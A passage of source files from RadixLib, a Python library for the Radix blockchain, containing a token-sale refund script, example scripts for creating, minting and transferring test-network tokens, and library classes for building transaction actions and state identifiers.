continue
# Getting all of the "TransferTokens" actions where tokens where sent from another address
# to our address.
actions: List[radix.actions.TransferTokens] = list(filter(
lambda x: isinstance(x, radix.actions.TransferTokens) and x.from_account.address != wallet.address and x.to_account.address == wallet.address, # type: ignore
tx['actions']
))
# If there are no actions where we get tokens, then ignore this transaction
if not actions:
continue
# Creating the action builder which will be used by this transaction
tx_action_builder: radix.ActionBuilder = wallet.action_builder
# Tallying up the tokens sent and their RRIs into an easy to query dictionary. There are two
# main reasons as to why we're doing this:
# 1. Just in case somebody sent XRD as well as other tokens to us in a single transaction,
# we want to refund them the other tokens that they've sent.
# 2. Just in case somebody is sneaky and knows how radix works and tries to send XRD using
# multiple actions just to try to break the system.
# This tokens tally will be used in a way very similar to how buckets are used in
# Scrypto, where we take the amount of tokens we need and then return the bucket back
# with whatever it has left
tokens_tally: Dict[str, int] = {}
tokens_tally[token_rri] = 0 # Setting this key as well since we're setting the dict keys
tokens_tally[config.xrd_rri] = 0 # Setting this key as well since we're setting the dict keys
for action in actions:
if action.token_rri not in tokens_tally.keys():
tokens_tally[action.token_rri] = 0
tokens_tally[action.token_rri] += action.amount
# Checking how many tokens the XRD amount sent pays for, and refunding the remaining amount
requested_amount: int = int(tokens_tally.get(config.xrd_rri, 0) / config.token_price_in_atto) * (10**18)
amount_to_supply: int = min(balance, requested_amount) # Limit the requested amount by the balance
tokens_tally[config.xrd_rri] -= int(amount_to_supply * radix.derive.xrd_from_atto(config.token_price_in_atto))
tokens_tally[token_rri] += amount_to_supply
# Reduce the balance by the amount that we took
balance -= tokens_tally[token_rri]
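# A purely illustrative walk-through of the arithmetic above (the price below is an assumed
# value, not taken from the real config module): with token_price_in_atto = 2 * 10**18
# (i.e. 2 XRD per token) and a buyer who sent 5 XRD (5 * 10**18 atto),
#     requested_amount = int(5e18 / 2e18) * 10**18 = 2 * 10**18   (2 whole tokens)
#     amount_to_supply = min(balance, 2 * 10**18)
# and, assuming radix.derive.xrd_from_atto simply divides by 10**18, the buyer is charged
# 4 XRD worth of atto while the leftover 1 XRD stays in tokens_tally[config.xrd_rri] to be
# refunded below.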
# Adding the tokens to the action builder of the transaction. At this stage, we have taken
# the amount of XRD which is owed to us and we're refunding the remaining xrd (whatever
# amount that might be).
for rri, amount in tokens_tally.items():
if amount == 0:
continue
tx_action_builder = tx_action_builder.token_transfer(
from_account_address = wallet.address,
to_account_address = actions[0].from_account.address,
token_rri = rri,
transfer_amount = amount
)
# Check if there are actions or not. If there are no actions, then there is no need to
# invoke the code that executes the transaction
if not tx_action_builder.to_action_list():
continue
tx_hash: str = wallet.build_sign_and_send_transaction(
actions = tx_action_builder,
message_string = "Here are your tokens good sir!",
encrypt_for_address = actions[0].from_account.address
)
handled_transactions_mapping[tx['hash']] = tx_hash
# Saving the state to the data file. We are saving the state with each transaction and not
# just once at the end. This is done to ensure that even if an exception does happen in the
# middle of the operation of the code, the transactions which have truly already been
# handled are put into the data file.
with open(config.data_json_file, 'w') as file:
data: Dict[str, Any] = {
"handled_transactions_mapping": handled_transactions_mapping
}
json.dump(data, file)
if __name__ == "__main__":
main()
```
#### File: examples/2- creating a new mutable supply token/main.py
```python
import radixlib as radix
import os
def main() -> None:
# Information about the token that we're creating
token_name: str = "Mutable Token"
token_symbol: str = "mut"
token_description: str = "Testing the creation of mutable token using the RadixLib python package."
token_icon_url: str = ""
token_url: str = ""
# Defining the network that the token will be created on
network: radix.network.Network = radix.network.STOKENET
# Getting the mnemonic phrase for the wallet that we will be connecting to and using to create
# the token. In this case, my mnemonic phrase is stored in an environment variable under the
# name "MNEMONIC_PHRASE". You might want to do the same or you could also just put your mnemonic
# phrase as a literal string.
mnemonic_phrase: str = os.environ['MNEMONIC_PHRASE']
# Creating a new wallet object using the mnemonic phrase above on the network defined.
wallet: radix.Wallet = radix.Wallet(
provider = radix.Provider(network),
signer = radix.Signer.from_mnemonic(mnemonic_phrase)
)
print("Wallet address:", wallet.address)
print("Wallet public key:", wallet.public_key)
# Deriving the RRI of the token before we create it.
token_rri: str = radix.derive.token_rri(wallet.public_key, token_symbol, network)
print("Creating new token:", token_rri)
# Using the quick transactions capability of the wallet object to create a transaction for the
# new token.
tx_hash: str = wallet.build_sign_and_send_transaction(
actions = (
wallet.action_builder
.new_mutable_token(
owner_address = wallet.address,
name = token_name,
symbol = token_symbol,
description = token_description,
icon_url = token_icon_url,
url = token_url,
granularity = 1 # Only a granularity of 1 is allowed in Radix at the moment.
)
)
)
print("Token transaction sent under hash:", tx_hash)
if __name__ == "__main__":
main()
```
#### File: examples/3- minting tokens/main.py
```python
import radixlib as radix
import os
def main() -> None:
# Information on the person who we will be minting the tokens for.
recipient_address: str = "tdx1qspqqecwh3tgsgz92l4d4f0e4egmfe86049dj75pgq347fkkfmg84pgx9um0v"
token_rri: str = "<KEY>"
mint_amount: int = 10 * (10**18) # This will mint 10 tokens
# Defining the network that we will be connecting to.
network: radix.network.Network = radix.network.STOKENET
# Getting the mnemonic phrase for the wallet that we will be connecting to. In this case, my
# mnemonic phrase is stored in an environment variable under the name "MNEMONIC_PHRASE".
# You might want to do the same or you could also just put your mnemonic phrase as a literal
# string.
mnemonic_phrase: str = os.environ['MNEMONIC_PHRASE']
# Creating a new wallet object using the mnemonic phrase above on the network defined.
wallet: radix.Wallet = radix.Wallet(
provider = radix.Provider(network),
signer = radix.Signer.from_mnemonic(mnemonic_phrase)
)
print("Wallet address:", wallet.address)
print("Wallet public key:", wallet.public_key)
# Using the quick transactions capability of the wallet object to create a transaction for the
# minting.
tx_hash: str = wallet.build_sign_and_send_transaction(
actions = (
wallet.action_builder
.mint_tokens(
to_account_address = recipient_address,
mint_amount = mint_amount,
token_rri = token_rri
)
)
)
print("Tokens minted under transaction hash:", tx_hash)
if __name__ == "__main__":
main()
```
#### File: examples/5- creating a new fixed supply token/main.py
```python
import radixlib as radix
import os
def main() -> None:
# Information about the token that we're creating
token_name: str = "Fixed Token"
token_symbol: str = "fix"
token_description: str = "Testing the creation of fixed supply token using the RadixLib python package."
token_icon_url: str = ""
token_url: str = ""
to_address: str = "tdx1qspqqecwh3tgsgz92l4d4f0e4egmfe86049dj75pgq347fkkfmg84pgx9um0v"
total_supply: int = 10_000 * (10**18) # The total supply of the token is 10_000
# Defining the network that the token will be created on
network: radix.network.Network = radix.network.STOKENET
# Getting the mnemonic phrase for the wallet that we will be connecting to and using to create
# the token. In this case, my mnemonic phrase is stored in an environment variable under the
# name "MNEMONIC_PHRASE". You might want to do the same or you could also just put your mnemonic
# phrase as a literal string.
mnemonic_phrase: str = os.environ['MNEMONIC_PHRASE']
# Creating a new wallet object using the mnemonic phrase above on the network defined.
wallet: radix.Wallet = radix.Wallet(
provider = radix.Provider(network),
signer = radix.Signer.from_mnemonic(mnemonic_phrase)
)
print("Wallet address:", wallet.address)
print("Wallet public key:", wallet.public_key)
# Deriving the RRI of the token before we create it.
token_rri: str = radix.derive.token_rri(wallet.public_key, token_symbol, network)
print("Creating new token:", token_rri)
# Using the quick transactions capability of the wallet object to create a transaction for the
# new token.
tx_hash: str = wallet.build_sign_and_send_transaction(
actions = (
wallet.action_builder
.new_fixed_supply_token(
owner_address = wallet.address,
name = token_name,
symbol = token_symbol,
description = token_description,
icon_url = token_icon_url,
url = token_url,
granularity = 1, # Only a granularity of 1 is allowed in Radix at the moment.
token_supply = total_supply,
to_account_address = to_address
)
)
)
print("Token transaction sent under hash:", tx_hash)
if __name__ == "__main__":
main()
```
#### File: examples/6- multi-action transactions/main.py
```python
import radixlib as radix
import os
def main() -> None:
# Information about the people who we will be sending the tokens to
recipient1_address: str = "tdx1qspw6g43xaef9uke65grhn074e00kvp9nr6mdj5gdhksc7r6cen8trch8lr6x"
recipient2_address: str = "tdx1qsp6t8v6f98rpn0zc4e84f388neca2xdme6rg7vddd9ef4teq444lhgkh4hmu"
recipient3_address: str = "tdx1qspzutm77jv33jn9v9xsxyelkqw6lyf6ewspkwex6mems4g6m589gxqcnv6g6"
token_rri: str = radix.constants.XRD_RRI['stokenet']
transfer_amount: int = radix.derive.atto_from_xrd(10) # 10 XRD for each address
# Defining the network that we will be connecting to.
network: radix.network.Network = radix.network.STOKENET
# Getting the mnemonic phrase for the wallet that we will be connecting to. In this case, my
# mnemonic phrase is stored in an environment variable under the name "MNEMONIC_PHRASE".
# You might want to do the same or you could also just put your mnemonic phrase as a literal
# string.
mnemonic_phrase: str = os.environ['MNEMONIC_PHRASE']
# Creating a new wallet object using the mnemonic phrase above on the network defined.
wallet: radix.Wallet = radix.Wallet(
provider = radix.Provider(network),
signer = radix.Signer.from_mnemonic(mnemonic_phrase)
)
print("Wallet address:", wallet.address)
print("Wallet public key:", wallet.public_key)
# Using the quick transactions capability of the wallet object to create a transaction for the
# multi-action token transfer transaction.
tx_hash: str = wallet.build_sign_and_send_transaction(
actions = (
wallet.action_builder
.token_transfer(
from_account_address = wallet.address,
to_account_address = recipient1_address,
token_rri = token_rri,
transfer_amount = transfer_amount
)
.token_transfer(
from_account_address = wallet.address,
to_account_address = recipient2_address,
token_rri = token_rri,
transfer_amount = transfer_amount
)
.token_transfer(
from_account_address = wallet.address,
to_account_address = recipient3_address,
token_rri = token_rri,
transfer_amount = transfer_amount
)
)
)
print("Tokens sent to addresses under transaction hash:", tx_hash)
# You can view the transaction I obtained from this example by finding it on the explorer at:
# https://stokenet-explorer.radixdlt.com//#/transactions/91cf51c2e65f08cc643240f4fd4ba8105a9f3026d37dd22826fc4a55e5d03106
# As you can see, the three addresses that we have put all received their XRD in a single
# transaction.
if __name__ == "__main__":
main()
```
#### File: examples/9- getting transaction history/method 1.py
```python
from typing import Optional, List, Dict, Any
import radixlib as radix
def main() -> None:
# The address of the account that we want to get the transaction history for.
account_address: str = "<KEY>"
# Defining the network that we will be connecting to.
network: radix.network.Network = radix.network.STOKENET
# Creating the provider object which is essentially our link or connection to the blockchain
# via the gateway API.
provider: radix.Provider = radix.Provider(network)
# Creating an empty list to store the transactions and beginning to query for the transactions
transactions_list: List[Dict[str, Any]] = []
cursor: Optional[str] = None
while True:
# Getting the transaction history for the current cursor
query_response: Dict[str, Any] = provider.get_account_transactions(
account_address = account_address,
cursor = cursor
)
# Parsing the query response and then extending the transactions list with the parsed
# response.
parsed_transaction_list: List[Dict[str, Any]] = radix.parsers.DefaultParser.parse(
data = query_response,
data_type = "get_account_transactions"
)
transactions_list.extend(parsed_transaction_list)
# Getting the cursor from the query response if it's present. If there is no cursor present
# then we have reached the end of the transaction history and can safely stop fetching
# transactions
cursor = query_response.get('next_cursor')
if cursor is None:
break
# Printing the transactions to the console
print('Transactions:', transactions_list)
if __name__ == "__main__":
main()
```
#### File: radixlib/actions/action_builder.py
```python
from radixlib.network import Network
from radixlib.actions import (
CreateTokenDefinition,
UnregisterValidator,
RegisterValidator,
TransferTokens,
UnstakeTokens,
StakeTokens,
MintTokens,
BurnTokens,
ActionType
)
from typing import Union, List, overload, Optional
import radixlib as radix
class ActionBuilder():
""" Used to build a list of Radix actions through a series of simple function calls.
Some of the actions in the new Gateway API can be rather confusing to create especially ones
where there is a series of optional arguments that are either required together or not required
together. To solve this problem, this action builder class introduces a set of functions which
may be used to create the desired actions.
This class is written with the idea that it should allow for method chaining to take place when
adding actions. So, you should expect to see most functions return a reference to self in order
to allow for action additions to be chained.
"""
def __init__(
self,
network: Network
) -> None:
""" Instantiates a new ActionBuilder for the given network.
Args:
network (Network): The network which the action builder will be used for.
"""
self.network: Network = network
self.__actions_list: List[ActionType] = []
def new_mutable_token(
self,
owner_address: str,
name: str,
symbol: str,
description: str,
icon_url: str,
url: str,
granularity: int,
) -> 'ActionBuilder':
""" Creates a new CreateTokenDefinition action which defines a mutable token.
Args:
owner_address (str): The address of the owner of the token.
name (str): The name of the token.
symbol (str): The symbol of the token. This should be a 3 to 8 long small case symbol
for the token.
description (str): The description of the token.
icon_url (str): The URL of the token icon.
url (str): The URL to the token website.
granularity (int): An integer of the token granularity
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Calculating the RRI of the token based on the information passed to the function
derived_token_rri: str = radix.derive.token_rri(
creator_public_key = radix.derive.public_key_from_wallet_address(owner_address),
token_symbol = symbol,
network = self.network
)
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
CreateTokenDefinition(
name = name,
symbol = symbol,
description = description,
icon_url = icon_url,
url = url,
granularity = granularity,
token_rri = derived_token_rri,
is_supply_mutable = True,
owner = owner_address
)
)
return self
def new_fixed_supply_token(
self,
owner_address: str,
name: str,
symbol: str,
description: str,
icon_url: str,
url: str,
granularity: int,
token_supply: int,
to_account_address: str
) -> 'ActionBuilder':
""" Creates a new CreateTokenDefinition action which defines a fixed supply token.
Args:
owner_address (str): The address of the owner of the token.
name (str): The name of the token.
symbol (str): The symbol of the token. This should be a 3 to 8 long small case symbol
for the token.
description (str): The description of the token.
icon_url (str): The URL of the token icon.
url (str): The URL to the token website.
granularity (int): An integer of the token granularity.
token_supply (int): The amount of supply of the token that we wish to have.
to_account_address (str): The address that the tokens will be sent to upon their
creation.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Calculating the RRI of the token based on the information passed to the function
derived_token_rri: str = radix.derive.token_rri(
creator_public_key = radix.derive.public_key_from_wallet_address(owner_address),
token_symbol = symbol,
network = self.network
)
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
CreateTokenDefinition(
name = name,
symbol = symbol,
description = description,
icon_url = icon_url,
url = url,
granularity = granularity,
token_rri = derived_token_rri,
is_supply_mutable = False,
token_supply = token_supply,
to_account = to_account_address
)
)
return self
def unstake_tokens_by_percentage(
self,
from_validator_address: str,
to_account_address: str,
percentage_amount: Union[int, float],
) -> 'ActionBuilder':
""" Creates a new UnstakeTokens action for a percentage of the tokens to unstake from
the specified validator.
Args:
from_validator_address (str): The validator that tokens will be unstaked from.
to_account_address (str): The address that the tokens will be sent to once unstaked.
percentage_amount (Union[int, float]): The percentage amount to unstake from the given
validator. Keep in mind that this is a percentage, meaning that it should
be a number between 0 and 100.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
UnstakeTokens(
to_account = to_account_address,
from_validator = from_validator_address,
unstake_percentage = percentage_amount
)
)
return self
def unstake_tokens_by_amount(
self,
from_validator_address: str,
to_account_address: str,
unstake_amount: int,
) -> 'ActionBuilder':
""" Creates a new UnstakeTokens action for a specific amount of the tokens to unstake from
the specified validator.
Args:
from_validator_address (str): The validator that tokens will be unstaked from.
to_account_address (str): The address that the tokens will be sent to once unstaked.
unstake_amount (int): The amount of XRD to unstake from the validator. Keep in mind that you
must specify this amount in Atto and not in XRD.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
UnstakeTokens(
to_account = to_account_address,
from_validator = from_validator_address,
amount = unstake_amount,
token_rri = radix.derive.xrd_rri_on_network(self.network)
)
)
return self
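# Hedged illustration of the two unstake flavours above (shown as a comment; the addresses
# are placeholders and `builder` is any ActionBuilder instance):
#
#     builder.unstake_tokens_by_percentage(
#         from_validator_address = "tv1...validator",
#         to_account_address = "tdx1...account",
#         percentage_amount = 50,              # unstake half of the staked XRD
#     )
#     builder.unstake_tokens_by_amount(
#         from_validator_address = "tv1...validator",
#         to_account_address = "tdx1...account",
#         unstake_amount = 100 * (10**18),     # 100 XRD, expressed in atto
#     )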
def stake_tokens_by_amount(
self,
to_validator_address: str,
from_account_address: str,
stake_amount: int,
) -> 'ActionBuilder':
""" Creates a new UnstakeTokens action for a specific amount of the tokens to unstake from
the specified validator.
Args:
to_validator_address (str): The validators that tokens will be unstaked from.
from_account_address (str): The address that the tokens will be sent to once unstaked.
stake_amount (int): The amount of XRD to unstake from the validator. Keep in mind that
you must specify this amount in Atto and not in XRD.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
StakeTokens(
from_account = from_account_address,
to_validator = to_validator_address,
amount = stake_amount,
token_rri = radix.derive.xrd_rri_on_network(self.network)
)
)
return self
def token_transfer(
self,
from_account_address: str,
to_account_address: str,
token_rri: str,
transfer_amount: int
) -> 'ActionBuilder':
""" Creates a new TokenTransfer action.
Args:
from_account_address (str): The account which will be sending the tokens.
to_account_address (str): The account which will be getting the tokens.
token_rri (str): The RRI of the token to send.
transfer_amount (int): The amount of tokens to send.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
TransferTokens(
from_account = from_account_address,
to_account = to_account_address,
amount = transfer_amount,
token_rri = token_rri
)
)
return self
def mint_tokens(
self,
to_account_address: str,
mint_amount: int,
token_rri: str,
) -> 'ActionBuilder':
""" Creates a new MintTokens action.
Args:
to_account_address (str): The account that the tokens will be minted for.
mint_amount (int): The amount of tokens to mint.
token_rri (str): The RRI of the token to mint.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
MintTokens(
to_account = to_account_address,
amount = mint_amount,
token_rri = token_rri
)
)
return self
def burn_tokens(
self,
from_account_address: str,
burn_amount: int,
token_rri: str,
) -> 'ActionBuilder':
""" Creates a new BurnTokens action.
Args:
from_account_address (str): The account that the tokens will be burned from.
burn_amount (int): The amount of tokens to burn.
token_rri (str): The RRI of the token to burn.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
BurnTokens(
from_account = from_account_address,
amount = burn_amount,
token_rri = token_rri
)
)
return self
@overload
def register_validator(self, *, validator_address: str) -> 'ActionBuilder': ...
@overload
def register_validator(self, *, node_address: str) -> 'ActionBuilder': ...
@overload
def register_validator(self, *, public_key: str) -> 'ActionBuilder': ...
@overload
def register_validator(self, *, account_address: str) -> 'ActionBuilder': ...
def register_validator(
self,
*,
validator_address: Optional[str] = None,
node_address: Optional[str] = None,
public_key: Optional[str] = None,
account_address: Optional[str] = None,
) -> 'ActionBuilder':
""" Creates a new RegisterValidator action.
This method is used to create a new RegisterValidator action and has four overrides to
allow this method to be called using anything that identifies the validator.
Args:
validator_address (:obj:`str`, optional): A string of the validator address to register.
node_address (:obj:`str`, optional): A string of the node address to register.
public_key (:obj:`str`, optional): A string of the public key of the validator to
register.
account_address (:obj:`str`, optional): A string of the account address of the validator
to register.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Getting the validator address from the arguments passed
_validator_address: str = ""
if validator_address:
_validator_address = validator_address
elif node_address:
_validator_address = radix.derive.validator_address_from_public_key(
public_key = radix.derive.public_key_from_node_or_validator_address(node_address),
network = self.network
)
elif public_key:
_validator_address = radix.derive.validator_address_from_public_key(
public_key = public_key,
network = self.network
)
elif account_address:
_validator_address = radix.derive.validator_address_from_public_key(
public_key = radix.derive.public_key_from_wallet_address(account_address),
network = self.network
)
else:
raise ValueError(
"At least one argument needs to be passed to this method to build the action."
)
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
RegisterValidator(_validator_address)
)
return self
@overload
def unregister_validator(self, *, validator_address: str) -> 'ActionBuilder': ...
@overload
def unregister_validator(self, *, node_address: str) -> 'ActionBuilder': ...
@overload
def unregister_validator(self, *, public_key: str) -> 'ActionBuilder': ...
@overload
def unregister_validator(self, *, account_address: str) -> 'ActionBuilder': ...
def unregister_validator(
self,
*,
validator_address: Optional[str] = None,
node_address: Optional[str] = None,
public_key: Optional[str] = None,
account_address: Optional[str] = None,
) -> 'ActionBuilder':
""" Creates a new UnregisterValidator action.
This method is used to create a new UnregisterValidator action and has four overrides to
allow this method to be called using anything that identifies the validator.
Args:
validator_address (:obj:`str`, optional): A string of the validator address to unregister.
node_address (:obj:`str`, optional): A string of the node address to unregister.
public_key (:obj:`str`, optional): A string of the public key of the validator to
unregister.
account_address (:obj:`str`, optional): A string of the account address of the validator
to unregister.
Returns:
ActionBuilder: A reference to self to allow for method chaining when adding actions.
"""
# Getting the validator address from the arguments passed
_validator_address: str = ""
if validator_address:
_validator_address = validator_address
elif node_address:
_validator_address = radix.derive.validator_address_from_public_key(
public_key = radix.derive.public_key_from_node_or_validator_address(node_address),
network = self.network
)
elif public_key:
_validator_address = radix.derive.validator_address_from_public_key(
public_key = public_key,
network = self.network
)
elif account_address:
_validator_address = radix.derive.validator_address_from_public_key(
public_key = radix.derive.public_key_from_wallet_address(account_address),
network = self.network
)
else:
raise ValueError(
"At least one argument needs to be passed to this method to build the action."
)
# Creating the action and appending it to the list of actions that have been created so far.
self.__actions_list.append(
UnregisterValidator(_validator_address)
)
return self
def to_action_list(self) -> List[ActionType]:
""" Gets a list of the actions that have been created by the action builder so far """
return self.__actions_list
```
#### File: radixlib/actions/mint_tokens.py
```python
from radixlib.api_types.identifiers import AccountIdentifier
from radixlib.serializable import Serializable
from radixlib.api_types import TokenAmount
from typing import Dict, Any
import radixlib as radix
import json
class MintTokens(Serializable):
""" Defines a MintTokens action """
def __init__(
self,
to_account: str,
amount: int,
token_rri: str,
) -> None:
""" Instantiates a new MintTokens action used for the creation of new tokens.
Args:
to_account (str): The account that the tokens will be minted for.
amount (int): The amount of tokens to mint.
token_rri (str): The RRI of the token to mint.
"""
self.to_account: AccountIdentifier = AccountIdentifier(to_account)
self.amount: int = amount
self.token_rri: str = token_rri
def to_dict(self) -> Dict[str, Any]:
"""" Converts the object to a dictionary """
return radix.utils.remove_none_values_recursively(
radix.utils.convert_to_dict_recursively({ # type: ignore
"type": "MintTokens",
"to_account": self.to_account,
"amount": TokenAmount(
rri = self.token_rri,
amount = self.amount
)
})
)
def to_json_string(self) -> str:
""" Converts the object to a JSON string """
return json.dumps(self.to_dict())
@classmethod
def from_dict(
cls,
dictionary: Dict[Any, Any]
) -> 'MintTokens':
""" Loads a MintTokens from a Gateway API response dictionary
Args:
dictionary (dict): The dictionary to load the object from
Returns:
MintTokens: A new MintTokens initialized from the dictionary
Raises:
TypeError: Raised when the type of the action in the dictionary does not match
the action name of the class
"""
if dictionary.get('type') != "MintTokens":
raise TypeError(f"Expected a dictionary with a type of MintTokens but got: {dictionary.get('type')}")
return cls(
to_account = dictionary['to_account']['address'],
amount = int(dictionary['amount']['value']),
token_rri = dictionary['amount']['token_identifier']['rri'],
)
@classmethod
def from_json_string(
cls,
json_string: str
) -> 'MintTokens':
""" Loads a MintTokens from a Gateway API response JSON string. """
return cls.from_dict(json.loads(json_string))
```
#### File: radixlib/actions/unstake_tokens.py
```python
from radixlib.api_types.identifiers import AccountIdentifier, ValidatorIdentifier
from radixlib.serializable import Serializable
from radixlib.api_types import TokenAmount
from typing import Dict, Any, Optional, overload
import radixlib as radix
import json
class UnstakeTokens(Serializable):
""" Defines an UnstakeTokens action """
@overload
def __init__(
self,
*,
to_account: str,
from_validator: str,
unstake_percentage: float
) -> None : ...
@overload
def __init__(
self,
*,
to_account: str,
from_validator: str,
amount: int,
token_rri: str
) -> None: ...
def __init__(
self,
*,
to_account: str,
from_validator: str,
unstake_percentage: Optional[float] = None,
amount: Optional[int] = None,
token_rri: Optional[str] = None,
) -> None:
""" Instantiates a new UnstakeTokens action used for the creation of new tokens.
Args:
to_account (str): The account that is unstaking their tokens.
from_validator (str): The validator to unstake the tokens from.
amount (int, optional): The amount of tokens to unstake.
token_rri (str, optional): The RRI of XRD on that specific network.
unstake_percentage (float, optional): An optional argument of the percentage of tokens
to unstake from the validator.
Note:
When calling this constructor, you need to specify one of the following:
#. The amount and token rri together.
#. The unstake percentage alone.
One of the above two choices must be specified for a successful constructor call.
Raises:
ValueError: Raised in the following cases:
#. When the token RRI given is not of the native XRD token.
#. When the percentage amount given is not between 0 and 100.
"""
# Checking if all of the arguments are none.
if unstake_percentage is None and amount is None and token_rri is None: # None given
raise ValueError("All of the amount specifiers were set to none. I can't tell how much you want to unstake.")
elif unstake_percentage is not None and (amount is not None or token_rri is not None): # All or some given
raise ValueError("Conflict between the amount specifiers. You've specified the percentage to unstake and the amount to unstake. You can't specify both at the same time.")
elif (amount is not None and token_rri is None) or (token_rri is not None and amount is None):
raise ValueError("You did not specify a complete TokenAmount.")
# Checking which of the arguments to set
if unstake_percentage is not None:
self.unstake_percentage: float = unstake_percentage
if not (0 <= self.unstake_percentage <= 100):
raise ValueError("The unstake percentage must be a number between 0 and 100.")
elif amount is not None and token_rri is not None:
self.amount: int = amount
self.token_rri: str = token_rri
if not token_rri.lower().startswith('xrd'):
raise ValueError("RRI provided is not of the network's native XRD token.")
self.to_account: AccountIdentifier = AccountIdentifier(to_account)
self.from_validator: ValidatorIdentifier = ValidatorIdentifier(from_validator)
def to_dict(self) -> Dict[str, Any]:
"""" Converts the object to a dictionary """
return radix.utils.remove_none_values_recursively(
radix.utils.convert_to_dict_recursively({
"type": "UnstakeTokens",
"to_account": self.to_account,
"from_validator": self.from_validator,
"amount": TokenAmount(
rri = self.token_rri,
amount = self.amount
) if getattr(self, 'amount', None) is not None else None,
"unstake_percentage": getattr(self, "unstake_percentage", None)
})
)
def to_json_string(self) -> str:
""" Converts the object to a JSON string """
return json.dumps(self.to_dict())
@classmethod
def from_dict(
cls,
dictionary: Dict[Any, Any]
) -> 'UnstakeTokens':
""" Loads a UnstakeTokens from a Gateway API response dictionary
Args:
dictionary (dict): The dictionary to load the object from
Returns:
UnstakeTokens: A new UnstakeTokens initialized from the dictionary
Raises:
TypeError: Raised when the type of the action in the dictionary does not match
the action name of the class
"""
if dictionary.get('type') != "UnstakeTokens":
raise TypeError(f"Expected a dictionary with a type of UnstakeTokens but got: {dictionary.get('type')}")
return cls(
to_account = dictionary['to_account']['address'],
from_validator = dictionary['from_validator']['address'],
amount = None if dictionary.get('amount') is None else int(dictionary['amount']['value']),
token_rri = None if dictionary.get('amount') is None else str(dictionary['amount']['token_identifier']['rri']),
unstake_percentage = dictionary.get('unstake_percentage')
)
@classmethod
def from_json_string(
cls,
json_string: str
) -> 'UnstakeTokens':
""" Loads a UnstakeTokens from a Gateway API response JSON string. """
return cls.from_dict(json.loads(json_string))
```
#### File: api_types/identifiers/state_identifier.py
```python
from radixlib.serializable import Serializable
import radixlib.utils as utils
from typing import Dict, Optional, Set, Any, overload
from datetime import datetime
import dateparser
import json
import pytz
class StateIdentifier(Serializable):
""" The implementation of an StateIdentifier """
@overload
def __init__(self, *, version: int) -> None: ...
@overload
def __init__(self, *, timestamp: datetime) -> None: ...
@overload
def __init__(self, *, epoch: int) -> None: ...
@overload
def __init__(self, *, epoch: int, round: int) -> None: ...
def __init__(
self,
*,
version: Optional[int] = None,
timestamp: Optional[datetime] = None,
epoch: Optional[int] = None,
round: Optional[int] = None
) -> None:
""" Instantiates a new StateIdentifier from the state information
Args:
version (:obj:`int`, optional): An optional argument that defaults to None. If the
version is provided, the latest ledger state <= the given version is returned.
timestamp (:obj:`datetime`, optional): An optional argument that defaults to None. If a
timestamp is provided, the latest ledger state <= the given timestamp is returned.
epoch (:obj:`int`, optional): An optional argument that defaults to None. If an epoch is
provided, the ledger state at the given epoch (and the given round, else round 0) is
returned.
round (:obj:`int`, optional): An optional argument that defaults to None. If a round is
provided, the ledger state at the given round of the given epoch is returned. A round
may only be given together with an epoch.
Raises:
ValueError: Raised when invalid StateIdentifier arguments are given. StateIdentifiers
are only valid in the cases below::
#. All of the arguments are missing (creating no state identifier.)
#. Only the state version is defined.
#. Only the timestamp is defined.
#. Only the epoch is defined.
#. Only the epoch and round is defined.
"""
# Checking the state identifier to ensure that it is a valid state identifier.
# These checks are done due to: https://github.com/radixdlt/radixdlt-network-gateway/blob/c473fab883a53f8821842013336d0db5d2cb0258/src/GatewayAPI/Database/LedgerStateQuerier.cs#L251
none_set: Set[None] = set([None])
is_all_missing: bool = set([version, timestamp, epoch, round]) == none_set
only_state_version: bool = version is not None and set([timestamp, epoch, round]) == none_set
only_timestamp: bool = timestamp is not None and set([version, epoch, round]) == none_set
only_epoch_given: bool = epoch is not None and set([timestamp, version, round]) == none_set
epoch_and_round_given: bool = epoch is not None and round is not None and set([timestamp, version]) == none_set
if [is_all_missing, only_state_version, only_timestamp, only_epoch_given, epoch_and_round_given].count(True) != 1:
raise ValueError("The at_state_identifier was not either (A) missing (B) with only a state_version; (C) with only a Timestamp; (D) with only an Epoch; or (E) with only an Epoch and Round")
# Setting the arguments to the variables
self.version: Optional[int] = version
self.timestamp: Optional[datetime] = timestamp
self.epoch: Optional[int] = epoch
self.round: Optional[int] = round
def __str__(self) -> str:
""" Converts the object to a string """
return f"""StateIdentifier({", ".join(map(lambda x: "%s=%s" % x, self.to_dict().items()))})"""
def __repr__(self) -> str:
""" Represents an object """
return str(self)
def __eq__(self, other: 'object') -> bool:
""" Checks for equality between self and other """
return self.to_dict() == other.to_dict() if isinstance(other, StateIdentifier) else False
def to_dict(self) -> Dict[str, Any]:
"""" Converts the object to a dictionary """
return utils.remove_none_values_recursively({
"version": self.version,
"timestamp": self.timestamp.astimezone(pytz.UTC).isoformat()[:23] + 'Z' if self.timestamp is not None else None,
"epoch": self.epoch,
"round": self.round,
})
def to_json_string(self) -> str:
""" Converts the object to a JSON string """
return json.dumps(self.to_dict())
@classmethod
def from_dict(
cls,
dictionary: Dict[str, Any]
) -> 'StateIdentifier':
""" Creates a new instance of the StateIdentifier from a dictionary
This method is used to load up a StateIdentifier from the dictionaries that are returned
by the Gateway API.
Args:
dictionary (dict): A dictionary of the StateIdentifier obtained from the Gateway API.
Returns:
StateIdentifier: A StateIdentifier loaded with the data
"""
return cls(
version = dictionary['version'],
timestamp = dateparser.parse(dictionary['timestamp']),
